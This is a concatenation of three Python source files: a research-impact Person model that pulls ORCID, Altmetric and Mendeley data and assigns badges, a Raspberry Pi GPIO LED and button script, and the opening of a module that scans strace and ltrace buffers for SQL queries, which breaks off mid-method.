print u"elapsed in call_apis after set_doi_from_crossref_biblio_lookup is {}s".format(elapsed(start_time, 2))
products_without_altmetric = [p for p in self.products if not p.altmetric_api_raw]
if overwrite_metrics or products_without_altmetric:
print u"** calling set_data_for_all_products for altmetric"
self.set_data_for_all_products("set_data_from_altmetric", high_priority)
else:
print u"** all products have altmetric data and no overwrite, so not calling altmetric"
print u"elapsed in call_apis after set_data_from_altmetric is {}s".format(elapsed(start_time, 2))
# products_without_mendeley = [p for p in self.products if not p.mendeley_api_raw]
# if overwrite_metrics or products_without_mendeley:
# print u"** calling set_data_for_all_products for mendeley"
# self.set_data_for_all_products("set_data_from_mendeley", high_priority)
# else:
# print u"** all products have mendeley data and no overwrite, so not calling mendeley"
#
# print u"elapsed in call_apis after set_data_from_mendeley is {}s".format(elapsed(start_time, 2))
# doesn't have error handling; called by refresh when you want it to be robust
def refresh_from_db(self):
print u"* refresh_from_db {}".format(self.orcid_id)
self.error = None
start_time = time()
try:
print u"** calling call_apis with overwrites false"
self.call_apis(overwrite_orcid=False, overwrite_metrics=False)
print u"** calling calculate"
self.calculate()
except (KeyboardInterrupt, SystemExit):
# let these ones through, don't save anything to db
raise
except requests.Timeout:
print u"got a requests timeout"
self.error = "requests timeout"
except OrcidDoesNotExist:
self.invalid_orcid = True
self.error = "invalid orcid"
print u"error: invalid orcid: {}".format(self.orcid_id)
except Exception:
logging.exception("refresh error")
self.error = "refresh error"
print u"in generic exception handler, so rolling back in case it is needed"
db.session.rollback()
finally:
self.updated = datetime.datetime.utcnow().isoformat()
if self.error:
print u"ERROR refreshing person {}: {}".format(self.id, self.error)
# doesn't throw errors; sets error column if error
def refresh(self, high_priority=False):
print u"* refreshing {} ({})".format(self.orcid_id, self.full_name)
self.error = ""
start_time = time()
try:
print u"** calling call_apis"
self.call_apis(high_priority=high_priority)
print u"** after call_apis, at {sec}s elapsed".format(
sec=elapsed(start_time)
)
print u"** calling calculate"
self.calculate()
print u"** after calculate, at {sec}s elapsed".format(
sec=elapsed(start_time)
)
print u"** finished refreshing all {num} products for {orcid_id} ({name}) in {sec}s".format(
orcid_id=self.orcid_id,
name=self.full_name,
num=len(self.all_products),
sec=elapsed(start_time)
)
except (KeyboardInterrupt, SystemExit):
# let these ones through, don't save anything to db
raise
except requests.Timeout:
print u"got a requests timeout"
self.error = "requests timeout"
except OrcidDoesNotExist:
self.invalid_orcid = True
self.error = "invalid orcid"
print u"error: invalid orcid: {}".format(self.orcid_id)
except Exception:
logging.exception("refresh error")
self.error = "refresh error"
print u"in generic exception handler, so rolling back in case it is needed"
db.session.rollback()
finally:
self.updated = datetime.datetime.utcnow().isoformat()
if self.error:
print u"ERROR refreshing person {}: {}".format(self.id, self.error)
def set_mendeley(self, high_priority=False):
self.set_data_for_all_products("set_data_from_mendeley", high_priority)
def set_mendeley_sums(self):
self.mendeley_sums = None
products_with_mendeley = [p for p in self.all_products if p.mendeley_api_raw]
if products_with_mendeley:
self.mendeley_sums = {
"readers": self.mendeley_readers,
"country": self.mendeley_countries,
"country_percent": as_proportion(self.mendeley_countries),
"subdiscipline": self.mendeley_disciplines,
"subdiscipline_percent": as_proportion(self.mendeley_disciplines),
"academic_status": self.mendeley_job_titles,
"academic_status_percent": as_proportion(self.mendeley_job_titles),
"h_index": self._mendeley_h_index,
"percent_of_products": self.mendeley_percent_of_products
}
else:
print "no mendeley"
return self.mendeley_sums
def set_products(self, products_to_add):
updated_products = []
for product_to_add in products_to_add:
needs_to_be_added = True
for my_existing_product in self.products:
if str(my_existing_product.orcid_put_code) == str(product_to_add.orcid_put_code):
# update the product biblio from the most recent orcid api response
my_existing_product.orcid_api_raw_json = product_to_add.orcid_api_raw_json
my_existing_product.set_biblio_from_orcid()
updated_products.append(my_existing_product)
needs_to_be_added = False
if needs_to_be_added:
updated_products.append(product_to_add)
self.products = updated_products
def recalculate_openness(self):
self.set_openness()
self.set_num_oa_licenses()
openness_badges = ["percent_fulltext", "all_fulltext", "open_license"]
self.assign_badges(limit_to_badges=openness_badges)
self.set_badge_percentiles(limit_to_badges=openness_badges)
def set_num_oa_licenses(self):
self.num_fulltext = 0
self.num_user_supplied_fulltext = 0
self.num_any_oa = 0
self.num_cc_by = 0
self.num_cc_restricted = 0
self.num_cc0_pd = 0
for p in self.products_with_dois:
if p.fulltext_url:
self.num_fulltext += 1
if p.user_supplied_fulltext_url:
self.num_user_supplied_fulltext += 1
if p.fulltext_url and p.license:
if p.license != "unknown":
self.num_any_oa += 1
if p.license == "cc-by":
self.num_cc_by += 1
elif p.license == "cc0" or p.license == "pd":
self.num_cc0_pd += 1
elif "cc-" in p.license:
self.num_cc_restricted += 1
def email_new_stuff(self):
if not self.claimed_at:
return
if not self.email:
return
DATE_NOTIFICATION_EMAILS_STARTED = "2018-09-10"
if not self.events_emailed:
self.events_emailed = {"emailed": []}
print u"looking for new stuff to email for {}".format(self.email)
posts = self.get_posts()
posts_to_email = []
for post in posts:
post_date_iso = post["posted_on"]
if post_date_iso > date_as_iso_utc(self.created):
if post_date_iso > DATE_NOTIFICATION_EMAILS_STARTED:
if post["url"] not in self.events_emailed["emailed"]:
posts_to_email.append(post)
if not posts_to_email:
print u"nothing to email."
return
print u"have things to email!"
post_urls = [post["url"] for post in posts_to_email]
self.events_emailed["emailed"] += post_urls
post_count_by_source = {}
for post in posts_to_email:
source = post["source"]
try:
post_count_by_source[source] += 1
except KeyError:
post_count_by_source[source] = 1
new_event_counts = post_count_by_source.items()
details_dict = self.to_dict()
details_dict["post_count_to_email"] = new_event_counts
send(self.email, "Your research is getting new attention online", "notification", {"profile": details_dict}, for_real=True)
# send(self.email, "Your research is getting new attention online", "notification", {"profile": details_dict}, for_real=False)
save_email(self.orcid_id, new_event_counts)
# def email_new_badge(self):
# if not self.claimed_at:
# return
# if not self.email:
# return
#
# if not self.get_badge("all_fulltext"):
# print u"not a hero."
# return
#
# print u"{} is a hero! going to email you!".format(self.full_name)
# details_dict = self.to_dict()
# send(self.email, "You're an Open Access Hero!", "new_badge", {"profile": details_dict}, for_real=True)
# # send(self.email, "You an an OA Hero!", "new_badge", {"profile": details_dict}, for_real=False)
#
def run_log_openness(self):
save_openness_log(self)
## used to fix people's pictures if they have updated them on twitter
## called from command line, ie python update.py Person.update_twitter_profile_data --id=0000-0003-3904-7546
def update_twitter_profile_data(self):
if not self.twitter or not self.twitter_creds:
print u"Can't update twitter, doesn't have twitter username or twitter_creds"
return None
oauth = OAuth1Session(
os.getenv('TWITTER_CONSUMER_KEY'),
client_secret=os.getenv('TWITTER_CONSUMER_SECRET')
)
url = "https://api.twitter.com/1.1/users/lookup.json?screen_name={}".format(self.twitter)
r = oauth.get(url)
response_data = r.json()
first_profile = response_data[0]
keys_to_update = ["profile_image_url", "profile_image_url_https"]
for k in keys_to_update:
self.twitter_creds[k] = first_profile[k]
print u"Updated twitter creds for @{}".format(self.twitter)
return self.twitter_creds
def refresh_orcid_info(self):
self.set_api_raw_from_orcid()
self.set_from_orcid()
self.set_num_products()
def calculate(self):
# things with api calls in them, or things needed to make those calls
start_time = time()
self.set_fulltext_urls()
self.set_depsy()
print u"finished api calling part of {method_name} on {num} products in {sec}s".format(
method_name="calculate".upper(),
num = len(self.products),
sec = elapsed(start_time, 2)
)
# everything else
start_time = time()
self.set_post_counts() # do this first
self.set_mendeley_sums()
self.set_num_posts()
self.set_num_mentions()
self.set_num_products()
self.set_openness() # do after set_fulltext_urls
self.set_num_oa_licenses() # do after set_fulltext_urls, before assign_badges
self.set_event_counts()
self.set_coauthors() # do this last, uses scores
print u"finished calculating part of {method_name} on {num} products in {sec}s".format(
method_name="calculate".upper(),
num = len(self.products),
sec = elapsed(start_time, 2)
)
start_time = time()
self.assign_badges()
self.set_badge_percentiles()
print u"finished badges part of {method_name} on {num} products in {sec}s".format(
method_name="calculate".upper(),
num = len(self.products),
sec = elapsed(start_time, 2)
)
def mini_calculate(self):
self.set_num_posts()
self.set_num_mentions()
self.set_num_products()
def set_depsy(self):
if self.email:
headers = {'Accept': 'application/json'}
# example http://depsy.org/api/search/person?email=ethan@weecology.org
url = "http://depsy.org/api/search/person?email={}".format(self.email)
# might throw requests.Timeout
try:
r = requests.get(url, headers=headers, timeout=10)
except requests.Timeout:
print u"timeout in set_depsy"
return
response_dict = r.json()
if response_dict["count"] > 0:
self.depsy_id = response_dict["list"][0]["id"]
self.depsy_percentile = response_dict["list"][0]["impact_percentile"]
print u"got a depsy id for {}: {}".format(self.id, self.depsy_id)
@property
def first_name(self):
first_name = self.given_names
try:
parsed_name = HumanName(self.full_name)
first_name = parsed_name["first"]
if first_name and len(first_name) <= 2 and parsed_name["middle"]:
first_name = parsed_name["middle"]
except KeyError:
pass
# print u"set first name {} as first name for {}".format(self.first_name, self.full_name)
return first_name
def set_api_raw_from_orcid(self):
start_time = time()
# look up profile in orcid
try:
orcid_data = make_and_populate_orcid_profile(self.orcid_id)
self.orcid_api_raw_json = orcid_data.api_raw_profile
except requests.Timeout:
self.error = "timeout from requests when getting orcid"
print u"finished {method_name} in {sec}s".format(
method_name="set_api_raw_from_orcid".upper(),
sec = elapsed(start_time, 2)
)
def set_fresh_orcid(self):
orcid_created_date_timestamp = self.orcid_api_raw_json["history"]["submission-date"]["value"]
orcid_created_date = datetime.datetime.fromtimestamp(orcid_created_date_timestamp/1000)
profile_created_date = self.created
if not profile_created_date:
# because just made and not set yet
profile_created_date = datetime.datetime.utcnow()
self.fresh_orcid = (profile_created_date - orcid_created_date).total_seconds() < (60*60) # 1 hour
def set_from_orcid(self):
total_start_time = time()
if not self.orcid_api_raw_json:
print u"no orcid data in db for {}".format(self.orcid_id)
return
orcid_data = OrcidProfile(self.orcid_id)
orcid_data.api_raw_profile = self.orcid_api_raw_json
self.given_names = orcid_data.given_names
self.family_name = orcid_data.family_name
self.set_fresh_orcid()
if orcid_data.best_affiliation:
self.affiliation_name = orcid_data.best_affiliation["name"]
self.affiliation_role_title = orcid_data.best_affiliation["role_title"]
else:
self.affiliation_name = None
self.affiliation_role_title = None
# now walk through all the orcid works and save the most recent ones in our db, deduped.
products_to_add = []
for work in orcid_data.works:
new_product = make_product(work)
products_to_add = distinct_product_list(new_product, products_to_add)
products_to_add.sort(key=operator.attrgetter('year_int'), reverse=True)
# keep only most recent products
products_to_add = products_to_add[:100]
self.set_products(products_to_add)
def set_fulltext_urls(self):
# handle this in impactstory
# ### first: user supplied a url? it is open!
# print u"first making user_supplied_fulltext_url products open"
for p in self.all_products:
if p.user_supplied_fulltext_url:
p.set_oa_from_user_supplied_fulltext_url(p.user_supplied_fulltext_url)
# then call oadoi on the rest!
dyno_name = os.getenv("DYNO", "")
if "schedule" in dyno_name or "RQ_worker_queue" in dyno_name:
print u"not calling call_oadoi because is a scheduled or RQ dyno"
else:
print u"isn't a scheduled or rq dyno, so calling call_oadoi"
self.call_oadoi()
def call_oadoi_on_everything(self):
return self.call_oadoi(call_even_if_already_open=True)
def call_oadoi(self, call_even_if_already_open=False):
start_time = time()
products_for_oadoi = self.products_with_dois
if not products_for_oadoi:
return
self.set_data_for_all_products("set_data_from_oadoi", include_products=products_for_oadoi)
open_products = [p for p in products_for_oadoi if p.has_fulltext_url]
print u"oadoi found {} of {} products had a free fulltext url ({})".format(
len(open_products), len(products_for_oadoi), round(float(len(open_products))/len(products_for_oadoi), 2))
print u"finished {method_name} on {num} products in {sec}s".format(
method_name="call_oadoi".upper(),
num = len(products_for_oadoi),
sec = elapsed(start_time, 2)
)
def set_data_for_all_products(self, method_name, high_priority=False, include_products=None):
start_time = time()
threads = []
# use all products unless passed a specific set
if not include_products:
include_products = self.all_products
# start a thread for each product
for work in include_products:
method = getattr(work, method_name)
process = threading.Thread(target=method, args=[high_priority])
process.start()
threads.append(process)
# wait till all work is done
for process in threads:
process.join()
# now go see if any of them had errors
# need to do it this way because can't catch thread failures; have to check
# object afterwards instead to see if they logged failures
for work in include_products:
if work.error:
# don't print out doi here because that could cause another bug
# print u"setting person error; {} for product {}".format(work.error, work.id)
self.error = work.error
print u"finished {method_name} on {num} products in {sec}s".format(
method_name=method_name.upper(),
num = len(include_products),
sec = elapsed(start_time, 2)
)
@property
def picture(self):
try:
url = self.twitter_creds["profile_image_url"].replace("_normal", "").replace("http:", "https:")
except TypeError:
# no twitter. let's try gravatar
try:
email_hash = hashlib.md5(self.email).hexdigest()
except TypeError:
# bummer, no email either. that's ok, gravatar will return a blank face for
# an email they don't have
email_hash = ""
url = u"https://www.gravatar.com/avatar/{}?s=110&d=mm".format(email_hash)
return url
@property
def wikipedia_urls(self):
articles = set()
for my_product in self.products_with_dois:
if my_product.post_counts_by_source("wikipedia"):
articles.update(my_product.wikipedia_urls)
return articles
@property
def distinct_fans_count(self):
fans = set()
for my_product in self.products_with_dois:
for fan_name in my_product.twitter_posters_with_followers:
fans.add(fan_name)
return len(fans)
@property
def countries_using_mendeley(self):
countries = set()
for my_product in self.all_products:
for my_country in my_product.countries_using_mendeley:
if my_country:
countries.add(my_country)
return sorted(countries)
@property
def countries(self):
countries = set()
for my_product in self.products:
for my_country in my_product.countries:
if my_country:
countries.add(my_country)
return sorted(countries)
@property
def subscores(self):
resp = []
subscore_names = ["buzz", "engagement", "openness", "fun"]
for subscore_name in subscore_names:
resp.append({
"name": subscore_name,
"display_name": subscore_name
})
return resp
@property
def sources(self):
sources = []
for source_name in sources_metadata:
source = Source(source_name, self.products)
if source.posts_count > 0:
sources.append(source)
return sources
# convenience so can have all of these set for one profile
def set_post_details(self):
for my_product in self.products_with_dois:
my_product.set_post_details()
def set_coauthors(self):
start_time = time()
        # the commit is commented out. this means coauthors made during this commit
        # session don't show up on this refresh, but we skip it because it is so much faster
# safe_commit(db)
# now go for it
# print u"running coauthors for {}".format(self.orcid_id)
coauthor_orcid_id_query = u"""select distinct orcid_id
from product
where doi in
(select doi from product where orcid_id='{}')""".format(self.orcid_id)
rows = db.engine.execute(text(coauthor_orcid_id_query))
# remove own orcid_id
        orcid_ids = [row[0] for row in rows if row[0] and row[0] != self.orcid_id]
if not orcid_ids:
return
# don't load products or badges
coauthors = Person.query.filter(Person.orcid_id.in_(orcid_ids)).options(orm.noload('*')).all()
resp = {}
for coauthor in coauthors:
resp[coauthor.orcid_id] = {
"name": coauthor.full_name,
"id": coauthor.id,
"orcid_id": coauthor.orcid_id,
"num_posts": coauthor.num_posts,
}
self.coauthors = resp
print u"elapsed {}s end of coathors".format(elapsed(start_time, 2))
def get_event_dates(self):
event_dates = []
for product in self.products_with_dois:
if product.event_dates:
for source, dates_list in product.event_dates.iteritems():
event_dates += dates_list
# now sort them all
event_dates.sort(reverse=False)
return event_dates
def set_event_counts(self):
self.monthly_event_count = 0
self.weekly_event_count = 0
event_dates = self.get_event_dates()
if not event_dates:
return
for event_date in event_dates:
event_days_ago = days_ago(event_date)
if event_days_ago <= 7:
self.weekly_event_count += 1
if event_days_ago <= 30:
self.monthly_event_count += 1
def get_tweeter_names(self, most_recent=None):
twitter_posts = self.get_twitter_posts(most_recent)
names = [post["attribution"] for post in twitter_posts if "attribution" in post]
return names
def get_twitter_posts(self, most_recent=None):
twitter_posts = [post for post in self.get_posts() if post["source"]=="twitter"]
if most_recent:
twitter_posts = twitter_posts[0:most_recent]
return twitter_posts
def get_posts(self):
posts = []
for my_product in self.products_with_dois:
posts += my_product.posts
return posts
@property
def percent_open_license(self):
if not self.products_with_dois:
return None
num_open_license_products = 0
if self.num_cc_by:
num_open_license_products += self.num_cc_by
if self.num_cc0_pd:
num_open_license_products += self.num_cc0_pd
num_products_with_dois = len(self.products_with_dois)
if num_products_with_dois >= 1:
response = min(1, round((num_open_license_products / float(num_products_with_dois)), 3))
else:
response = None
return response
@property
def percent_fulltext(self):
if not self.products_with_dois:
return None
num_products_with_dois = len(self.products_with_dois)
num_open_products = len([p for p in self.products_with_dois if p.has_fulltext_url])
        # only defined if there is at least one product with a doi
if num_products_with_dois >= 1:
response = min(1, round((num_open_products / float(num_products_with_dois)), 3))
else:
response = None
return response
def set_openness(self):
self.openness = self.percent_fulltext
return self.openness
def post_counts_by_source(self, source_name):
if self.post_counts and source_name in self.post_counts:
return self.post_counts[source_name]
return 0
def set_post_counts(self):
self.post_counts = {}
for p in self.products_with_dois:
if p.post_counts:
for metric, count in p.post_counts.iteritems():
try:
self.post_counts[metric] += int(count)
except KeyError:
self.post_counts[metric] = int(count)
# print u"setting post_counts", self.post_counts
def set_num_posts(self):
self.num_posts = 0
if self.post_counts:
self.num_posts = sum(self.post_counts.values())
def set_num_mentions(self):
self.num_mentions = sum([p.num_mentions for p in self.all_products])
def set_num_products(self):
self.num_products = len(self.all_products)
def get_token(self):
# print u"in get_token with ", self
payload = {
'id': self.id,
'email': self.email,
'num_products': self.num_products,
'finished_wizard': self.finished_wizard,
'orcid_id': self.orcid_id,
'twitter_screen_name': self.twitter,
'first_name': self.first_name,
'claimed_at': date_as_iso_utc(self.claimed_at),
'iat': datetime.datetime.utcnow(),
'exp': datetime.datetime.utcnow() + datetime.timedelta(days=999),
}
# for testing
# payload["orcid_id"] = None
# payload["num_products"] = 0
token = jwt.encode(payload, os.getenv("JWT_KEY"))
return token.decode('unicode_escape')
@property
def badges_to_show_in_ui(self):
return [b for b in self.badges_for_api if b.my_badge_type.show_in_ui]
@property
def overview_badges(self):
overview_possibilities = self.badges_to_show_in_ui
if len(overview_possibilities) <= 3:
return overview_possibilities
already_have_groups = []
badges_to_return = []
for my_badge in overview_possibilities:
if my_badge.group not in already_have_groups and my_badge.group != "fun":
badges_to_return.append(my_badge)
already_have_groups.append(my_badge.group)
if len(badges_to_return) < 3:
for my_badge in overview_possibilities:
if my_badge.group != "fun" and (my_badge.name not in [b.name for b in badges_to_return]):
badges_to_return.append(my_badge)
return badges_to_return[0:3]
@property
def badges_for_api(self):
badges = []
for my_badge in self.badges:
if my_badge.value and my_badge.my_badge_type.valid_badge:
# custom exclusions specific to badge type
badges.append(my_badge)
badges.sort(key=lambda x: x.sort_score, reverse=True)
# custom exclusions specific to badge type
if len(badges) > 1:
badges = [b for b in badges if b.name != "first_steps"]
return badges
def get_badge(self, badge_name):
for my_badge in self.badges:
if my_badge.name == badge_name:
return my_badge
return None
def assign_badges(self, limit_to_badges=[]):
for badge_assigner_class in badge.all_badge_assigners():
badge_assigner = badge_assigner_class()
if limit_to_badges:
if badge_assigner.name not in limit_to_badges:
# isn't a badge we want to assign right now, so skip
continue
candidate_badge = badge_assigner.get_badge_or_None(self)
already_assigned_badge = self.get_badge(badge_assigner.name)
if candidate_badge:
if already_assigned_badge:
already_assigned_badge.value = candidate_badge.value
already_assigned_badge.products = candidate_badge.products
already_assigned_badge.support = candidate_badge.support
print u"{} already had badge, now updated {}".format(
self.id, already_assigned_badge)
else:
print u"{} first time got badge {}".format(self.id, candidate_badge)
self.badges.append(candidate_badge)
if candidate_badge.name == 'babel':
print u"BABEL support: {}".format(candidate_badge.support)
else:
# print u"nope, {} doesn't get badge {}".format(self.id, badge_assigner.name)
if already_assigned_badge:
print u"{} doesn't get badge {}, but had it before, so removing".format(self.id, badge_assigner.name)
if already_assigned_badge.name == 'babel':
print u"first, here was its BABEL support: {}".format(already_assigned_badge.support)
print u"used to have babel support on dois: {}".format(already_assigned_badge.dois)
badge.Badge.query.filter_by(id=already_assigned_badge.id).delete()
self.num_badges = len(self.badges_to_show_in_ui)
def set_badge_percentiles(self, limit_to_badges=[]):
badge_names = [my_badge.name for my_badge in self.badges]
refsets = Refset.query.filter(Refset.name.in_(badge_names)).all()
for my_badge in self.badges:
if limit_to_badges:
if my_badge.name not in limit_to_badges:
# isn't a badge we want to assign right now, so skip
continue
if my_badge.name in badge.all_badge_assigner_names():
# from http://stackoverflow.com/a/7125547/596939
matching_refset = next((ref for ref in refsets if ref.name==my_badge.name), None)
if matching_refset:
my_badge.set_percentile(matching_refset.cutoffs)
@property
def parsed_name(self):
return u"{} {}".format(self.given_names, self.family_name)
@property
def full_name(self):
return u"{} {}".format(self.given_names, self.family_name)
@property
def num_twitter_followers(self):
try:
return self.twitter_creds["followers_count"]
except TypeError:
return None
@property
def display_coauthors(self):
if not self.coauthors:
return None
else:
ret = []
for coauthor in self.coauthors.values():
coauthor["sort_score"] = coauthor.get("num_posts", 0)
ret.append(coauthor)
return ret
# convenience method
def all_products_set_biblio_from_orcid(self):
for p in self.all_products:
p.set_biblio_from_orcid()
@property
def sorted_products(self):
return sorted([p for p in self.products],
key=lambda k: k.altmetric_score,
reverse=True)
@property
def products_with_dois(self):
ret = [p for p in self.all_products if p.doi]
return ret
@property
def products_no_dois(self):
ret = [p for p in self.all_products if not p.doi]
return ret
@property
def products_with_mentions(self):
ret = [p for p in self.all_products if p.has_mentions]
return ret
@property
def all_products(self):
ret = self.sorted_products
return ret
@property
def mendeley_readers(self):
total = 0
for p in self.all_products:
if p.mendeley_api_raw and "reader_count" in p.mendeley_api_raw:
total += p.mendeley_api_raw["reader_count"]
return total
@property
def mendeley_percent_of_products(self):
if not self.all_products:
return None
count = 0
for p in self.all_products:
if p.mendeley_api_raw and "reader_count" in p.mendeley_api_raw:
if p.mendeley_api_raw["reader_count"] >= 1:
count += 1
return float(count) / len(self.all_products)
@property
def mendeley_countries(self):
resp = {}
for p in self.all_products:
try:
resp = update_recursive_sum(resp, p.mendeley_api_raw["reader_count_by_country"])
except (AttributeError, TypeError):
pass
return resp
@property
def mendeley_disciplines(self):
resp = {}
for p in self.all_products:
try:
resp = update_recursive_sum(resp, p.mendeley_disciplines)
except (AttributeError, TypeError):
pass
return resp
@property
def mendeley_job_titles(self):
resp = {}
for p in self.all_products:
try:
resp = update_recursive_sum(resp, p.mendeley_job_titles)
except (AttributeError, TypeError):
pass
return resp
@property
def _mendeley_h_index(self):
reader_counts = []
for p in self.all_products:
try:
reader_counts.append(p.mendeley_api_raw["reader_count"])
except (KeyError, TypeError):
reader_counts.append(0)
t_index = h_index(reader_counts)
return t_index
def __repr__(self):
return u'<Person ({id}, @{twitter}, {orcid_id}) "{given_names} {family_name}" >'.format(
id=self.id,
twitter=self.twitter,
orcid_id=self.orcid_id,
given_names=self.given_names,
family_name=self.family_name
)
def to_dict(self):
ret = {
"_id": self.id, # do this too, so it is on top
"_full_name": self.full_name,
"id": self.id,
"orcid_id": self.orcid_id,
"email": self.email,
"first_name": self.first_name,
"given_names": self.given_names,
"family_name": self.family_name,
"created": date_as_iso_utc(self.created),
"updated": date_as_iso_utc(self.updated),
"claimed_at": date_as_iso_utc(self.claimed_at),
"picture": self.picture,
"affiliation_name": self.affiliation_name,
"affiliation_role_title": self.affiliation_role_title,
"twitter": self.twitter,
"depsy_id": self.depsy_id,
"campaign": self.campaign,
"percent_fulltext": self.percent_fulltext,
"percent_open_license": self.percent_open_license,
"fresh_orcid": self.fresh_orcid,
"num_posts": self.num_posts,
"num_mentions": self.num_mentions,
"num_orcid_products": len(self.all_products),
"mendeley": {
"country_percent": as_proportion(self.mendeley_countries),
"subdiscipline_percent": as_proportion(self.mendeley_disciplines),
"job_title_percent": as_proportion(self.mendeley_job_titles),
"mendeley_url": None,
"readers": self.mendeley_readers,
"percent_of_products": self.mendeley_percent_of_products
},
"sources": [s.to_dict() for s in self.sources],
"overview_badges": [b.to_dict() for b in self.overview_badges],
"badges": [b.to_dict() for b in self.badges_for_api],
"coauthors": self.display_coauthors,
"subscores": self.subscores,
"products": [p.to_dict() for p in self.all_products],
"num_twitter_followers": self.num_twitter_followers,
"promos": self.promos
}
# for testing! no products for jason.
# if self.orcid_id == "0000-0001-6187-6610":
# ret["products"] = []
return ret
def h_index(citations):
# from http://www.rainatian.com/2015/09/05/leetcode-python-h-index/
citations.sort(reverse=True)
i=0
while (i<len(citations) and i+1 <= citations[i]):
i += 1
return i
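# Illustrative sketch, not called anywhere: a worked example of the h_index()
# helper above. With citations [3, 0, 6, 1, 5], sorting in descending order
# gives [6, 5, 3, 1, 0]; the loop stops at i=3 because the 4th value (1) is
# smaller than 4, so the h-index is 3. Note that the list is sorted in place.
def _example_h_index():
    assert h_index([3, 0, 6, 1, 5]) == 3
    assert h_index([10, 8, 5, 4, 3]) == 4
    assert h_index([]) == 0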
|
DKJ.py
|
import RPi.GPIO as GPIO
from time import sleep
from threading import Thread
import multiprocessing as mp
import ds18b20_temp_sensor
led1 = 3
led2 = 18
button= 11
counter = 0
Led = True
def setup():
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(led1, GPIO.OUT)
GPIO.setup(led2, GPIO.OUT)
GPIO.setup(button, GPIO.IN, pull_up_down = GPIO.PUD_DOWN)
def control_LED1():
global counter
global Led
Led = not Led
if Led:
GPIO.output(led1, GPIO.HIGH)
counter+=1
#print('Counter: {}'.format(counter))
else:
GPIO.output(led1, GPIO.LOW)
def control_LED2():
    # Blink the second LED forever; this runs in its own thread started below.
    while True:
        GPIO.output(led2, GPIO.HIGH)
        sleep(2)
        GPIO.output(led2, GPIO.LOW)
        sleep(2)
def detect_button():
GPIO.remove_event_detect(button)
GPIO.add_event_detect(button, GPIO.RISING, callback=lambda x:control_LED1(),bouncetime=200)
def printing():
while True:
sleep(2)
print('This is using multi-threading')
if __name__ == '__main__':
setup()
#GPIO.add_event_detect(button, GPIO.RISING, callback=lambda x:control_LED2(),bouncetime=200)
p1 = Thread(target = control_LED2)
p2 = Thread(target = detect_button)
p3 = Thread(target = printing)
p1.start()
p2.start()
p3.start()
p1.join()
p2.join()
p3.join()
GPIO.cleanup()
quit()
|
cim_objects_definitions.py
|
# This contains the definitions of CIM objects and their containers.
# These containers are filled when function calls detect the creation
# or handling of such an object.
# This module contains specialized containers for these objects,
# which are later used to create a Dockerfile.
import os
import re
import six
import sys
import json
import platform
import datetime
import socket
import shutil
import threading
import time
import collections
import logging
try:
# This is for Python 2
import urllib2
import urllib
urlencode_portable = urllib.urlencode
except ImportError:
import urllib.request as urllib2
import urllib.parse
urlencode_portable = urllib.parse.urlencode
try:
# This is optional when used from dockit, so dockit can be used
# without any installation.
import psutil
except ImportError:
psutil = None
is_py3 = sys.version_info >= (3,)
is_platform_linux = sys.platform.startswith("linux")
################################################################################
def DecodeOctalEscapeSequence(aBuffer):
# An octal escape sequence consists of \ followed by one, two, or three octal digits.
# The octal escape sequence ends when it either contains three octal digits already,
# or the next character is not an octal digit.
# For example, \11 is a single octal escape sequence denoting a byte with numerical value 9 (11 in octal),
# rather than the escape sequence \1 followed by the digit 1.
# However, \1111 is the octal escape sequence \111 followed by the digit 1.
# In order to denote the byte with numerical value 1, followed by the digit 1,
# one could use "\1""1", since C automatically concatenates adjacent string literals.
# Note that some three-digit octal escape sequences may be too large to fit in a single byte;
# this results in an implementation-defined value for the byte actually produced.
# The escape sequence \0 is a commonly used octal escape sequence,
# which denotes the null character, with value zero.
# https://en.wikipedia.org/wiki/Escape_sequences_in_C
# https://stackoverflow.com/questions/4020539/process-escape-sequences-in-a-string-in-python
if is_py3:
decBuf = bytes(aBuffer, "utf-8").decode("unicode_escape")
else:
decBuf = aBuffer.decode('string_escape')
return decBuf
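# Minimal sketch of how the decoder above behaves (illustrative only, never
# called in this module); the same results hold for the Python 2 branch.
def _example_decode_octal_escape():
    # "\11" is a single octal escape denoting the byte with value 9 (a tab).
    assert DecodeOctalEscapeSequence("\\11") == "\t"
    # "\1111" is the octal escape "\111" (the letter "I") followed by the digit "1".
    assert DecodeOctalEscapeSequence("\\1111") == "I1"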
################################################################################
# Buffers transferred with read() and write() are parsed to detect information
# about the running applications. There can be several types of parsers,
# indexed by a descriptive key: "SqlQuery" etc...
# TODO: There is no valid reason to load all buffer scanners in this file.
BufferScanners = {}
try:
sys.path.append("../..")
# This creates the SQL queries scanner, it needs Survol code.
from survol import lib_sql
dictRegexSQL = lib_sql.SqlRegularExpressions()
dictRegexSQLCompiled = {
rgxKey : re.compile(dictRegexSQL[rgxKey], re.IGNORECASE)
for rgxKey in dictRegexSQL
}
# This returns a list of SQL queries.
def RawBufferSqlQueryScanner(aBuffer):
# The regular expressions are indexed with a key such as "INSERT", "SELECT" etc...
# which gives a hint about what the query does.
# This creates a dictionary mapping the RDF property to the compiled regular expression.
# Also, the regular expressions are compiled for better performance.
lstQueries = []
for rgxKey in dictRegexSQLCompiled:
compiledRgx = dictRegexSQLCompiled[rgxKey]
matchedSqls = compiledRgx.findall(aBuffer)
if matchedSqls:
lstQueries += matchedSqls
# TODO: For the moment, we just print the query. How can it be related to a database ?
# How can we get the database connection ?
# If attaching to a running process, this is even impossible.
        # TODO: We can create a symbolic database connection: at least we know the server name.
# We can associate one connection to each socket or pipe where a SQL query could be found.
# ... possibly list the connections as CIM objects.
        # An extra regular expression on the buffer, or some test on the SQL query,
        # might imply the database type. This is not very important because the
        # database connection is obvious information for the user.
return lstQueries
BufferScanners["SqlQuery"] = RawBufferSqlQueryScanner
except ImportError:
print("Cannot import optional module lib_sql")
pass
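# Hedged, illustrative sketch of how another scanner could be plugged into
# BufferScanners. The "HttpUrl" key and the regular expression are assumptions
# made up for this example; the scanner is deliberately not registered, so the
# module behaviour is unchanged. Registering it would simply be:
#     BufferScanners["HttpUrl"] = _example_raw_buffer_http_url_scanner
_example_rgx_http_url = re.compile(r"https?://[^\s\"']+")
def _example_raw_buffer_http_url_scanner(aBuffer):
    # Returns the list of URLs found in one transferred buffer.
    return _example_rgx_http_url.findall(aBuffer)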
################################################################################
# When strace or ltrace display a call to read() and write(), they also display
# a fragment of the transferred bytes. It is needed to try to rebuild the entire
# sequence between the opening and the closing, because some important information
# that we want to parse might be truncated.
# Beware, there are severe limitations: The amount of displayed bytes is limited,
# and it does not take into account fseek().
class BufferConcatenator:
def __init__(self):
self.m_currentBuffer = None
self.m_parsedData = None
def __analyse_io_buffer(self,aBuffer):
for scannerKey in BufferScanners:
